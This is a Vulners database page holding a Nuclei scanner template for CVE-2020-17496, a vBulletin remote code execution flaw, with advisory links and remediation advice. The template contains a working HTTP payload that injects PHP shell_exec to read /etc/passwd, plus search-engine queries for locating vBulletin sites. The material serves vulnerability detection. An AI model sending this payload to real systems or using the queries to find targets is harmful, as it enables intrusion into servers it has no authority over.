| Reporter | Title | Published | Views | Family All 24 |
|---|---|---|---|---|
| CVE-2020-7373 | 30 Oct 202000:00 | – | attackerkb | |
| CVE-2020-17496 | 12 Aug 202000:00 | – | attackerkb | |
| The vulnerability of the commercial vBulletin web forum exists due to the lack of measures to neutralize special elements, allowing attackers to execute arbitrary commands. | 24 Aug 202100:00 | – | bdu_fstec | |
| CVE-2020-17496 | 12 Aug 202018:11 | – | circl | |
| vBulletin PHP Module Remote Code Execution Vulnerability | 3 Nov 202100:00 | – | cisa_kev | |
| vBulletin Forum Remote Code Execution (CVE-2019-16759; CVE-2020-17496) | 25 Sep 201900:00 | – | checkpoint_advisories | |
| CVE-2020-17496 | 12 Aug 202013:07 | – | cve | |
| CVE-2020-17496 | 12 Aug 202013:07 | – | cvelist | |
| vBulletin 5.x /ajax/render/widget_tabbedcontainer_tab_panel PHP remote code execution. | 13 Aug 202017:40 | – | metasploit | |
| CVE-2020-17496 | 12 Aug 202014:15 | – | nvd |
id: CVE-2020-17496
info:
name: vBulletin 5.5.4 - 5.6.2- Remote Command Execution
author: pussycat0x
severity: critical
description: 'vBulletin versions 5.5.4 through 5.6.2 allow remote command execution via crafted subWidgets data in an ajax/render/widget_tabbedcontainer_tab_panel request. NOTE: this issue exists because of an incomplete fix for CVE-2019-16759.'
impact: |
Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the target system.
remediation: |
Upgrade vBulletin to a version that is not affected by CVE-2020-17496.
reference:
- https://www.tenable.com/blog/zero-day-remote-code-execution-vulnerability-in-vbulletin-disclosed
- https://nvd.nist.gov/vuln/detail/CVE-2020-17496
- https://seclists.org/fulldisclosure/2020/Aug/5
- https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4445227-vbulletin-5-6-0-5-6-1-5-6-2-security-patch
- https://cwe.mitre.org/data/definitions/78.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-17496
cwe-id: CWE-74
epss-score: 0.8774
epss-percentile: 0.9974
cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: vbulletin
product: vbulletin
shodan-query:
- http.title:"powered by vbulletin"
- http.html:"powered by vbulletin"
- http.component:"vbulletin"
- cpe:"cpe:2.3:a:vbulletin:vbulletin"
fofa-query:
- body="powered by vbulletin"
- title="powered by vbulletin"
google-query:
- intext:"powered by vbulletin"
- intitle:"powered by vbulletin"
tags: cve2020,cve,vbulletin,rce,kev,tenable,seclists,vkev,vuln
http:
- raw:
- |
POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 4b0a00483046022100873d6b92371140761de8959156a10d5e38f4d23401c7a2f0ff37916772ace33e0221009aa1f4fbaad2cdfaae045b137a28232356edd6904504e065d4795ef407d6b536:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation